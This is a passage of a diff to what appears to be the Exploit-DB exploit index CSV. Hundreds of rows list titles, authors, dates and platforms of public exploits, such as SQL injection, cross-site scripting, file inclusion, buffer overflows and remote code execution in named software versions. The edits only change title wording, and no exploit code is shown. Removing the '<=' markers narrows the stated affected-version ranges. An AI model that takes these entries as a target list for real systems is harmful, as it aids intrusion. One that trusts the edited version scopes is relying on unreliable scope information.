XSS",2007-06-20,Doz,asp,webapps,0 -30206,platforms/cfm/webapps/30206.txt,"FuseTalk <= 4.0 forum/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",cfm,webapps,0 +30206,platforms/cfm/webapps/30206.txt,"FuseTalk 4.0 forum/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",cfm,webapps,0 30394,platforms/windows/remote/30394.rb,"Adobe Reader ToolButton - Use After Free",2013-12-17,Metasploit,windows,remote,0 30202,platforms/cfm/webapps/30202.txt,"FuseTalk 2.0/3.0 - AuthError.CFM SQL Injection",2007-06-19,"Ivan Almuina",cfm,webapps,0 30183,platforms/multiple/local/30183.txt,"Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities",2013-12-10,Vulnerability-Lab,multiple,local,0 @@ -26901,14 +26901,14 @@ id,file,description,date,author,platform,type,port 29797,platforms/php/webapps/29797.txt,"MyBB Ajaxfs 2 Plugin - SQL Injection",2013-11-24,"IeDb ir",php,webapps,0 29799,platforms/windows/local/29799.pl,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2013-11-24,"Mike Czumak",windows,local,0 29800,platforms/windows/dos/29800.py,"Microsoft Internet Explorer 7.0 HTML Denial of Service",2007-03-28,shinnai,windows,dos,0 -29801,platforms/php/local/29801.php,"PHP <= 5.2.1 Session.Save_Path() TMPDIR Open_Basedir Restriction Bypass",2007-03-28,"Stefan Esser",php,local,0 +29801,platforms/php/local/29801.php,"PHP 5.2.1 Session.Save_Path() TMPDIR Open_Basedir Restriction Bypass",2007-03-28,"Stefan Esser",php,local,0 29802,platforms/hardware/webapps/29802.txt,"TPLINK WR740N/WR740ND - Multiple CSRF Vulnerabilities",2013-11-25,"Samandeep Singh",hardware,webapps,0 29803,platforms/windows/dos/29803.pl,"Static Http Server 1.0 - Denial of Service (DoS) Exploit",2013-11-25,GalaxyAndroid,windows,dos,0 -29804,platforms/php/local/29804.php,"PHP <= 5.2.1 - Multiple Functions Reference Parameter Information Disclosure",2007-03-29,"Stefan Esser",php,local,0 -29805,platforms/php/webapps/29805.txt,"Drake CMS 0.3.7 404.php Local File Include",2007-03-30,"HACKERS PAL",php,webapps,0 -29806,platforms/php/webapps/29806.pl,"PHP-Fusion <= 6.1.5 Calendar_Panel Module Show_Event.php SQL Injection",2007-03-31,UNIQUE-KEY,php,webapps,0 -29807,platforms/php/remote/29807.php,"PHP <= 5.1.6 Imap_Mail_Compose() Function Buffer Overflow",2007-03-31,"Stefan Esser",php,remote,0 -29808,platforms/php/remote/29808.php,"PHP <= 5.1.6 - Msg_Receive() Memory Allocation Integer Overflow",2007-03-31,"Stefan Esser",php,remote,0 +29804,platforms/php/local/29804.php,"PHP 5.2.1 - Multiple Functions Reference Parameter Information Disclosure",2007-03-29,"Stefan Esser",php,local,0 +29805,platforms/php/webapps/29805.txt,"Drake CMS 0.3.7 404.php Local File Inclusion",2007-03-30,"HACKERS PAL",php,webapps,0 +29806,platforms/php/webapps/29806.pl,"PHP-Fusion 6.1.5 Calendar_Panel Module Show_Event.php SQL Injection",2007-03-31,UNIQUE-KEY,php,webapps,0 +29807,platforms/php/remote/29807.php,"PHP 5.1.6 Imap_Mail_Compose() Function Buffer Overflow",2007-03-31,"Stefan Esser",php,remote,0 +29808,platforms/php/remote/29808.php,"PHP 5.1.6 - Msg_Receive() Memory Allocation Integer Overflow",2007-03-31,"Stefan Esser",php,remote,0 29809,platforms/linux/dos/29809.txt,"PulseAudio 0.9.5 Assert() Remote Denial of Service",2007-04-02,"Luigi Auriemma",linux,dos,0 29810,platforms/windows/dos/29810.c,"Symantec Multiple Products - SPBBCDrv Driver Local Denial of Service",2007-04-01,"David Matousek",windows,dos,0 29813,platforms/windows/dos/29813.py,"Microsoft Windows Vista ARP Table Entries Denial of Service",2004-04-02,"Kristian Hermansen",windows,dos,0 @@ -26921,14 +26921,14 @@ id,file,description,date,author,platform,type,port 29820,platforms/multiple/remote/29820.html,"Firebug 1.03 Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",multiple,remote,0 29821,platforms/php/webapps/29821.txt,"Livor 2.5 Index.php Cross-Site Scripting",2007-04-06,"Arham Muhammad",php,webapps,0 29822,platforms/linux/local/29822.c,"Man Command - -H Flag Local Buffer Overflow",2007-04-06,"Daniel Roethlisberger",linux,local,0 -29823,platforms/php/dos/29823.c,"PHP <= 5.2.1 GD Extension WBMP File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0 -29824,platforms/php/webapps/29824.txt,"QuizShock <= 1.6.1 - Auth.php HTML Injection",2007-04-09,"John Martinelli",php,webapps,0 -29825,platforms/php/webapps/29825.txt,"UBB.Threads <= 6.1.1 UBBThreads.php SQL Injection",2007-04-09,"John Martinelli",php,webapps,0 +29823,platforms/php/dos/29823.c,"PHP 5.2.1 GD Extension WBMP File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0 +29824,platforms/php/webapps/29824.txt,"QuizShock 1.6.1 - Auth.php HTML Injection",2007-04-09,"John Martinelli",php,webapps,0 +29825,platforms/php/webapps/29825.txt,"UBB.Threads 6.1.1 UBBThreads.php SQL Injection",2007-04-09,"John Martinelli",php,webapps,0 29826,platforms/linux/dos/29826.txt,"Linux Kernel 2.6.x - AppleTalk ATalk_Sum_SKB Function Denial of Service",2007-04-09,"Jean Delvare",linux,dos,0 -29827,platforms/php/webapps/29827.pl,"eCardMAX HotEditor 4.0 Keyboard.php Local File Include",2007-04-09,Liz0ziM,php,webapps,0 +29827,platforms/php/webapps/29827.pl,"eCardMAX HotEditor 4.0 Keyboard.php Local File Inclusion",2007-04-09,Liz0ziM,php,webapps,0 29828,platforms/php/webapps/29828.html,"DeskPro 2.0.1 Login.php HTML Injection",2007-04-09,"John Martinelli",php,webapps,0 29829,platforms/php/webapps/29829.txt,"Einfacher Passworschutz Index.php Cross-Site Scripting",2007-04-10,hackberry,php,webapps,0 -29830,platforms/php/webapps/29830.txt,"MyNews 4.2.2 Week_Events.php Remote File Include",2007-04-10,hackberry,php,webapps,0 +29830,platforms/php/webapps/29830.txt,"MyNews 4.2.2 Week_Events.php Remote File Inclusion",2007-04-10,hackberry,php,webapps,0 29831,platforms/php/webapps/29831.txt,"DropAFew 0.2 newaccount2.php Arbitrary Account Creation",2007-04-10,"Alexander Klink",php,webapps,0 29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 - search.php delete Action id Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 @@ -26940,7 +26940,7 @@ id,file,description,date,author,platform,type,port 29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",windows,remote,0 29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 Admin/Index.php Directory Traversal",2007-04-11,Dr.RoVeR,php,webapps,0 29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a CGI Check Cookie Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 -29843,platforms/windows/remote/29843.txt,"webMethods Glue <= 6.5.1 Console Directory Traversal",2007-04-11,"Patrick Webster",windows,remote,0 +29843,platforms/windows/remote/29843.txt,"webMethods Glue 6.5.1 Console Directory Traversal",2007-04-11,"Patrick Webster",windows,remote,0 29844,platforms/cgi/webapps/29844.txt,"Cosign 2.0.1/2.9.4a CGI Register Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 29845,platforms/php/webapps/29845.txt,"phpwebnews 0.1 iklan.php m_txt Parameter XSS",2007-04-07,the_Edit0r,php,webapps,0 29846,platforms/php/webapps/29846.txt,"phpwebnews 0.1 index.php m_txt Parameter XSS",2007-04-07,the_Edit0r,php,webapps,0 @@ -26958,31 +26958,31 @@ id,file,description,date,author,platform,type,port 29859,platforms/java/remote/29859.rb,"Apache Roller OGNL Injection",2013-11-27,Metasploit,java,remote,8080 29860,platforms/windows/dos/29860.c,"ZoneAlarm 6.1.744.001/6.5.737.000 Vsdatant.SYS Driver Local Denial of Service",2007-04-15,"Matousec Transparent security",windows,dos,0 29861,platforms/php/webapps/29861.txt,"Palo Alto Networks Pan-OS 5.0.8 - Multiple Vulnerabilities",2013-11-27,"Thomas Pollet",php,webapps,0 -29862,platforms/php/webapps/29862.pl,"Web Service Deluxe News Manager 1.0.1 Deluxe Footer.php Local File Include",2007-04-16,BeyazKurt,php,webapps,0 -29863,platforms/php/webapps/29863.txt,"Actionpoll 1.1 Actionpoll.php Remote File Include",2007-04-16,SekoMirza,php,webapps,0 +29862,platforms/php/webapps/29862.pl,"Web Service Deluxe News Manager 1.0.1 Deluxe Footer.php Local File Inclusion",2007-04-16,BeyazKurt,php,webapps,0 +29863,platforms/php/webapps/29863.txt,"Actionpoll 1.1 Actionpoll.php Remote File Inclusion",2007-04-16,SekoMirza,php,webapps,0 29864,platforms/php/webapps/29864.php,"MyBlog 0.9.8 Settings.php Authentication Bypass",2007-04-16,BlackHawk,php,webapps,0 29865,platforms/php/webapps/29865.txt,"Wabbit Gallery Script 0.9 Showpic.php Multiple Cross-Site Scripting Vulnerabilities",2007-04-17,the_Edit0r,php,webapps,0 29866,platforms/php/webapps/29866.txt,"PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass and Multiple SQL Injection Vulnerabilities",2007-04-17,Aleksandar,php,webapps,0 29867,platforms/windows/dos/29867.xml,"NetSprint Ask IE Toolbar 1.1 - Multiple Denial of Service Vulnerabilities",2007-04-17,"Michal Bucko",windows,dos,0 29868,platforms/php/webapps/29868.txt,"NuclearBB Alpha 1 - Multiple SQL Injection Vulnerabilities",2007-04-18,"John Martinelli",php,webapps,0 -29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 PHPBB_Root_Path Remote File Include",2007-04-19,"HACKERS PAL",php,webapps,0 +29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 PHPBB_Root_Path Remote File Inclusion",2007-04-19,"HACKERS PAL",php,webapps,0 29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_debug.php url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0 29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_slashbox.php rss_url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0 29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/0.96.6 - iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0 29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0 -29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 Turbulence.php Remote File Include",2007-04-20,Omni,php,webapps,0 +29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 Turbulence.php Remote File Inclusion",2007-04-20,Omni,php,webapps,0 29875,platforms/multiple/dos/29875.py,"AMSN 0.96 - Malformed Message Denial of Service",2007-04-21,"Levent Kayan",multiple,dos,0 29876,platforms/php/webapps/29876.txt,"TJSChat 0.95 You.php Cross-Site Scripting",2007-04-23,the_Edit0r,php,webapps,0 29877,platforms/php/webapps/29877.html,"Ripe Website Manager 0.8.4 contact/index.php ripeformpost Parameter SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 -29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 Level2.php Remote File Include",2007-04-23,Dr.RoVeR,php,webapps,0 -29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 Init.Inc.php Remote File Include",2007-04-23,MoHaNdKo,php,webapps,0 -29880,platforms/php/webapps/29880.txt,"File117 - Multiple Remote File Include Vulnerabilities",2007-04-23,InyeXion,php,webapps,0 +29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 Level2.php Remote File Inclusion",2007-04-23,Dr.RoVeR,php,webapps,0 +29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 Init.Inc.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 +29880,platforms/php/webapps/29880.txt,"File117 - Multiple Remote File Inclusion Vulnerabilities",2007-04-23,InyeXion,php,webapps,0 29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR/DEP Bypass Exploit with SANDBOX BYPASS",2013-11-28,"w3bd3vil and abh1sek",windows,local,0 29882,platforms/php/webapps/29882.html,"PHPMySpace Gold 8.10 Article.php SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 -29883,platforms/php/webapps/29883.txt,"ACVSWS Transport.php Remote File Include",2007-04-23,MoHaNdKo,php,webapps,0 -29884,platforms/multiple/remote/29884.txt,"Apple Quicktime <= 7.1.5 QTJava toQTPointer() Java Handling Arbitrary Code Execution",2007-04-23,"Shane Macaulay",multiple,remote,0 -29885,platforms/php/webapps/29885.txt,"Claroline 1.x RootSys Remote File Include",2007-04-23,MoHaNdKo,php,webapps,0 -29886,platforms/php/webapps/29886.txt,"Lms 1.5.x RTMessageAdd.php Remote File Include",2007-04-23,InyeXion,php,webapps,0 +29883,platforms/php/webapps/29883.txt,"ACVSWS Transport.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 +29884,platforms/multiple/remote/29884.txt,"Apple Quicktime 7.1.5 QTJava toQTPointer() Java Handling Arbitrary Code Execution",2007-04-23,"Shane Macaulay",multiple,remote,0 +29885,platforms/php/webapps/29885.txt,"Claroline 1.x RootSys Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 +29886,platforms/php/webapps/29886.txt,"Lms 1.5.x RTMessageAdd.php Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 29887,platforms/php/webapps/29887.txt,"Phorum 5.1.20 admin.php Groups Module group_id Parameter XSS",2007-04-23,"Janek Vind",php,webapps,0 29888,platforms/php/webapps/29888.txt,"Phorum 5.1.20 admin.php modsettings Module smiley_id Parameter XSS",2007-04-23,"Janek Vind",php,webapps,0 29889,platforms/php/webapps/29889.txt,"Phorum 5.1.20 - include/controlcenter/users.php Multiple Method Remote Privilege Escalation",2007-04-23,"Janek Vind",php,webapps,0 @@ -26991,29 +26991,29 @@ id,file,description,date,author,platform,type,port 29892,platforms/php/webapps/29892.html,"Phorum 5.1.20 pm.php Recipient Name SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 29893,platforms/php/webapps/29893.txt,"Phorum 5.1.20 admin.php badwords/banlist Module SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 29894,platforms/php/webapps/29894.txt,"Phorum 5.1.20 admin.php Groups Module Edit/Add Group Field SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 -29895,platforms/php/webapps/29895.txt,"phpMyAdmin <= 2.9.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-24,sp3x@securityreason.com,php,webapps,0 +29895,platforms/php/webapps/29895.txt,"phpMyAdmin 2.9.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-24,sp3x@securityreason.com,php,webapps,0 29896,platforms/windows/dos/29896.c,"Cdelia Software ImageProcessing Malformed BMP File Denial of Service",2007-04-24,Dr.Ninux,windows,dos,0 29897,platforms/windows/remote/29897.txt,"Progress 3.1 Webspeed _CPYFile.P Unauthorized Access",2007-04-24,suresync,windows,remote,0 -29898,platforms/php/webapps/29898.txt,"plesk <= 8.1.1 login.php3 - Directory Traversal",2007-04-25,anonymous,php,webapps,0 -29899,platforms/php/webapps/29899.txt,"MyNewsGroups 0.6 Include.php Remote File Include",2007-04-25,"Ali and Saeid",php,webapps,0 +29898,platforms/php/webapps/29898.txt,"plesk 8.1.1 login.php3 - Directory Traversal",2007-04-25,anonymous,php,webapps,0 +29899,platforms/php/webapps/29899.txt,"MyNewsGroups 0.6 Include.php Remote File Inclusion",2007-04-25,"Ali and Saeid",php,webapps,0 29900,platforms/multiple/dos/29900.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow Vulnerabilities (1)",2007-03-21,"Barrie Dempster",multiple,dos,0 29901,platforms/multiple/dos/29901.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow Vulnerabilities (2)",2007-03-21,"Barrie Dempster",multiple,dos,0 -29902,platforms/php/webapps/29902.txt,"PHPMyTGP 1.4 AddVIP.php Remote File Include",2007-04-25,alijsb,php,webapps,0 -29903,platforms/php/webapps/29903.txt,"Ahhp Portal Page.php Multiple Remote File Include Vulnerabilities",2007-04-25,CodeXpLoder'tq,php,webapps,0 +29902,platforms/php/webapps/29902.txt,"PHPMyTGP 1.4 AddVIP.php Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 +29903,platforms/php/webapps/29903.txt,"Ahhp Portal Page.php Multiple Remote File Inclusion Vulnerabilities",2007-04-25,CodeXpLoder'tq,php,webapps,0 29904,platforms/php/webapps/29904.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool b2archives.php b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 29905,platforms/php/webapps/29905.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool b2categories.php b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 29906,platforms/php/webapps/29906.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool b2mail.php b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 -29907,platforms/php/webapps/29907.txt,"Comus 2.0 Accept.php Remote File Include",2007-04-25,alijsb,php,webapps,0 -29908,platforms/php/webapps/29908.txt,"TurnkeyWebTools Sunshop 3.5/4.0 - Multiple Remote File Include Vulnerabilities",2007-04-25,s3rv3r_hack3r,php,webapps,0 -29909,platforms/php/webapps/29909.txt,"HYIP Manager Pro Multiple Remote File Include Vulnerabilities",2007-04-25,alijsb,php,webapps,0 -29910,platforms/php/webapps/29910.txt,"HTMLEditBox 2.2 Config.php Remote File Include",2007-04-25,alijsb,php,webapps,0 +29907,platforms/php/webapps/29907.txt,"Comus 2.0 Accept.php Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 +29908,platforms/php/webapps/29908.txt,"TurnkeyWebTools Sunshop 3.5/4.0 - Multiple Remote File Inclusion Vulnerabilities",2007-04-25,s3rv3r_hack3r,php,webapps,0 +29909,platforms/php/webapps/29909.txt,"HYIP Manager Pro Multiple Remote File Inclusion Vulnerabilities",2007-04-25,alijsb,php,webapps,0 +29910,platforms/php/webapps/29910.txt,"HTMLEditBox 2.2 Config.php Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29911,platforms/php/webapps/29911.txt,"DynaTracker 1.5.1 includes_handler.php base_path Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29912,platforms/php/webapps/29912.txt,"DynaTracker 1.5.1 action.php base_path Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 -29913,platforms/php/webapps/29913.txt,"Active PHP Bookmarks 1.0 APB.php Remote File Include",2007-04-25,"ali & saeid",php,webapps,0 -29914,platforms/php/webapps/29914.txt,"Doruk100Net Info.php Remote File Include",2007-04-26,Ali7,php,webapps,0 +29913,platforms/php/webapps/29913.txt,"Active PHP Bookmarks 1.0 APB.php Remote File Inclusion",2007-04-25,"ali & saeid",php,webapps,0 +29914,platforms/php/webapps/29914.txt,"Doruk100Net Info.php Remote File Inclusion",2007-04-26,Ali7,php,webapps,0 29915,platforms/php/webapps/29915.txt,"MoinMoin 1.5.x Index.php Cross-Site Scripting",2007-04-26,"En Douli",php,webapps,0 29916,platforms/linux/dos/29916.c,"Linux Kernel 2.6.x - NETLINK_FIB_LOOKUP Local Denial of Service",2007-04-26,"Alexey Kuznetsov",linux,dos,0 -29917,platforms/php/webapps/29917.php,"FlashComs Chat <= 6.5 - Arbitrary File Upload",2013-11-30,"Miya Chung",php,webapps,0 +29917,platforms/php/webapps/29917.php,"FlashComs Chat 6.5 - Arbitrary File Upload",2013-11-30,"Miya Chung",php,webapps,0 29918,platforms/java/webapps/29918.txt,"Ametys CMS 3.5.2 - (lang parameter) XPath Injection",2013-11-30,LiquidWorm,java,webapps,0 29919,platforms/hardware/dos/29919.py,"TP-Link TL-WR740N / TL-WR740ND - 150M Wireless Lite N Router HTTP DoS",2013-11-30,"Dino Causevic",hardware,dos,0 29920,platforms/linux/dos/29920.py,"Uptime Agent 5.0.1 - Stack Overflow",2013-11-30,"Denis Andzakovic",linux,dos,0 @@ -27028,24 +27028,24 @@ id,file,description,date,author,platform,type,port 29932,platforms/linux/remote/29932.txt,"Red Hat Directory Server 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-30,"Kaushal Desai",linux,remote,0 29933,platforms/asp/webapps/29933.txt,"Gazi Download Portal Down_Indir.ASP SQL Injection",2007-04-30,ertuqrul,asp,webapps,0 29934,platforms/windows/dos/29934.py,"ZIP Password Recovery Professional 5.1 - (.zip) Crash PoC",2013-11-30,KAI,windows,dos,0 -29935,platforms/php/webapps/29935.php,"MyBB <= 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,php,webapps,0 +29935,platforms/php/webapps/29935.php,"MyBB 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,php,webapps,0 29938,platforms/php/webapps/29938.txt,"E-Annu Home.php SQL Injection",2007-04-30,ilkerkandemir,php,webapps,0 29939,platforms/linux/dos/29939.txt,"X.Org X Window System Xserver 1.3 XRender Extension Divide by Zero Denial of Service",2007-05-01,"Derek Abdine",linux,dos,0 29940,platforms/windows/dos/29940.html,"Mozilla Firefox 2.0.0.3 Href Denial of Service",2007-05-01,"Carl Hardwick",windows,dos,0 29941,platforms/php/webapps/29941.txt,"CMS Made Simple 105 Stylesheet.php SQL Injection",2007-05-02,"Daniel Lucq",php,webapps,0 29942,platforms/windows/dos/29942.c,"Atomix MP3 Malformed MP3 File Buffer Overflow",2007-05-02,preth00nker,windows,dos,0 29943,platforms/windows/dos/29943.c,"Progress WebSpeed 3.0/3.1 - Denial of Service",2007-05-02,"Eelko Neven",windows,dos,0 -29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 Logout.php Remote File Include",2007-05-03,"ilker Kandemir",php,webapps,0 +29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 Logout.php Remote File Inclusion",2007-05-03,"ilker Kandemir",php,webapps,0 29945,platforms/hardware/remote/29945.txt,"D-Link DSL-G624T Var:RelaodHref Cross-Site Scripting",2007-05-03,"Tim Brown",hardware,remote,0 29946,platforms/php/webapps/29946.txt,"WordPress Orange Themes - CSRF File Upload",2013-12-01,"Jje Incovers",php,webapps,0 30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 Content.php SQL Injection",2007-06-18,"Jesper Jurcenoks",php,webapps,0 30198,platforms/asp/webapps/30198.txt,"TDizin Arama.ASP Cross-Site Scripting",2007-06-18,GeFORC3,asp,webapps,0 -30199,platforms/cgi/webapps/30199.txt,"WebIf OutConfig Parameter Local File Include",2007-06-18,maiosyet,cgi,webapps,0 -30059,platforms/php/webapps/30059.py,"Eaton Network Shutdown Module <= 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",php,webapps,0 +30199,platforms/cgi/webapps/30199.txt,"WebIf OutConfig Parameter Local File Inclusion",2007-06-18,maiosyet,cgi,webapps,0 +30059,platforms/php/webapps/30059.py,"Eaton Network Shutdown Module 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",php,webapps,0 29949,platforms/windows/dos/29949.c,"Multiple Vendors Zoo Compression Algorithm Remote Denial of Service",2007-05-04,Jean-Sébastien,windows,dos,0 -29950,platforms/osx/local/29950.js,"Apple <= 2.0.4 Safari Unspecified Local",2007-05-04,poplix,osx,local,0 +29950,platforms/osx/local/29950.js,"Apple 2.0.4 Safari Unspecified Local",2007-05-04,poplix,osx,local,0 29951,platforms/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 - Cross-Site Scripting",2007-05-04,Solarius,windows,remote,0 -29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 MFA_Theme.php Remote File Include",2007-05-07,kezzap66345,php,webapps,0 +29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 MFA_Theme.php Remote File Inclusion",2007-05-07,kezzap66345,php,webapps,0 29954,platforms/linux/local/29954.txt,"ELinks Relative 0.10.6 - /011.1 Path Arbitrary Code Execution",2007-05-07,"Arnaud Giersch",linux,local,0 29955,platforms/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module Index.php SQL Injection",2007-05-07,Bulan,php,webapps,0 29956,platforms/php/webapps/29956.txt,"ObieWebsite Mini Web Shop 2 order_form.php PATH_INFO Parameter XSS",2007-05-02,CorryL,php,webapps,0 @@ -27111,10 +27111,10 @@ id,file,description,date,author,platform,type,port 30068,platforms/php/webapps/30068.txt,"Jetbox CMS 2.1 Login Variable Cross-Site Scripting",2007-05-22,"Jesper Jurcenoks",php,webapps,0 30069,platforms/windows/remote/30069.html,"Dart ZipLite Compression 1.8.5.3 DartZipLite.DLL ActiveX Control Buffer Overflow",2007-05-22,shinnai,windows,remote,0 30070,platforms/php/webapps/30070.html,"ClonusWiki 0.5 Index.php HTML Injection",2007-05-22,"John Martinelli",php,webapps,0 -30071,platforms/php/webapps/30071.txt,"ABC Excel Parser Pro 4.0 Parser_Path Remote File Include",2007-05-22,the_Edit0r,php,webapps,0 +30071,platforms/php/webapps/30071.txt,"ABC Excel Parser Pro 4.0 Parser_Path Remote File Inclusion",2007-05-22,the_Edit0r,php,webapps,0 30072,platforms/php/webapps/30072.txt,"PsychoStats 3.0.6b - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-22,"John Martinelli",php,webapps,0 30073,platforms/php/webapps/30073.txt,"GMTT Music Distro 1.2 ShowOwn.php Cross-Site Scripting",2007-05-22,CorryL,php,webapps,0 -30074,platforms/linux/remote/30074.txt,"PHP PEAR <= 1.5.3 - INSTALL-AS Attribute Arbitrary File Overwrite",2007-05-07,"Gregory Beaver",linux,remote,0 +30074,platforms/linux/remote/30074.txt,"PHP PEAR 1.5.3 - INSTALL-AS Attribute Arbitrary File Overwrite",2007-05-07,"Gregory Beaver",linux,remote,0 30075,platforms/php/webapps/30075.txt,"phpPgAdmin 4.1.1 SQLEDIT.php Cross-Site Scripting",2007-05-23,"Michal Majchrowicz",php,webapps,0 30076,platforms/php/webapps/30076.txt,"WYYS 1.0 Index.php Cross-Site Scripting",2007-05-23,vagrant,php,webapps,0 30077,platforms/asp/webapps/30077.txt,"Cisco CallManager 4.1 - Search Form Cross-Site Scripting",2007-05-23,"Marc Ruef",asp,webapps,0 @@ -27131,13 +27131,13 @@ id,file,description,date,author,platform,type,port 30089,platforms/linux/remote/30089.txt,"Ruby on Rails 1.2.3 To_JSON - Script Injection",2007-05-25,BCC,linux,remote,0 30091,platforms/linux/dos/30091.py,"OpenOffice 2.2 Writer Component Remote Denial of Service",2007-05-28,shinnai,linux,dos,0 30095,platforms/php/webapps/30095.txt,"DGNews 1.5.1/2.1 News.php SQL Injection",2007-05-28,"Jesper Jurcenoks",php,webapps,0 -30096,platforms/osx/local/30096.txt,"Apple Mac OS X <= 10.4.9 - VPND Local Format String",2007-05-29,"Chris Anley",osx,local,0 -30097,platforms/php/webapps/30097.txt,"UebiMiau <= 2.7.10 demo/pop3/error.php selected_theme Parameter XSS",2007-05-29,"Michal Majchrowicz",php,webapps,0 -30098,platforms/php/webapps/30098.txt,"UebiMiau <= 2.7.10 demo/pop3/error.php Multiple Variable Path Disclosure",2007-05-29,"Michal Majchrowicz",php,webapps,0 +30096,platforms/osx/local/30096.txt,"Apple Mac OS X 10.4.9 - VPND Local Format String",2007-05-29,"Chris Anley",osx,local,0 +30097,platforms/php/webapps/30097.txt,"UebiMiau 2.7.10 demo/pop3/error.php selected_theme Parameter XSS",2007-05-29,"Michal Majchrowicz",php,webapps,0 +30098,platforms/php/webapps/30098.txt,"UebiMiau 2.7.10 demo/pop3/error.php Multiple Variable Path Disclosure",2007-05-29,"Michal Majchrowicz",php,webapps,0 30099,platforms/php/webapps/30099.txt,"DGNews 2.1 NewsID Parameter SQL Injection",2007-05-28,"laurent gaffie",php,webapps,0 30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 Manufacturer.php SQL Injection",2007-05-29,"laurent gaffie",php,webapps,0 30102,platforms/php/webapps/30102.php,"Pheap 2.0 Config.php Pheap_Login Authentication Bypass",2007-05-30,Silentz,php,webapps,0 -30103,platforms/php/webapps/30103.txt,"Particle Blogger <= 1.2.1 Archives.php SQL Injection",2007-03-16,Serapis.net,php,webapps,0 +30103,platforms/php/webapps/30103.txt,"Particle Blogger 1.2.1 Archives.php SQL Injection",2007-03-16,Serapis.net,php,webapps,0 30104,platforms/windows/dos/30104.nasl,"F-Secure Policy Manager 7.00 - FSMSH.DLL Remote Denial of Service",2007-05-30,"David Maciejak",windows,dos,0 30193,platforms/windows/dos/30193.html,"Apple Safari 3.0.1 for Windows Corefoundation.DLL Denial of Service",2007-06-16,Lostmon,windows,dos,0 30194,platforms/windows/dos/30194.txt,"Apple Safari 3 for Windows Document.Location Denial of Service",2007-06-16,azizov,windows,dos,0 @@ -27148,18 +27148,18 @@ id,file,description,date,author,platform,type,port 30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Stored XSS in Multiple Parameters",2013-12-11,sajith,php,webapps,0 30215,platforms/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 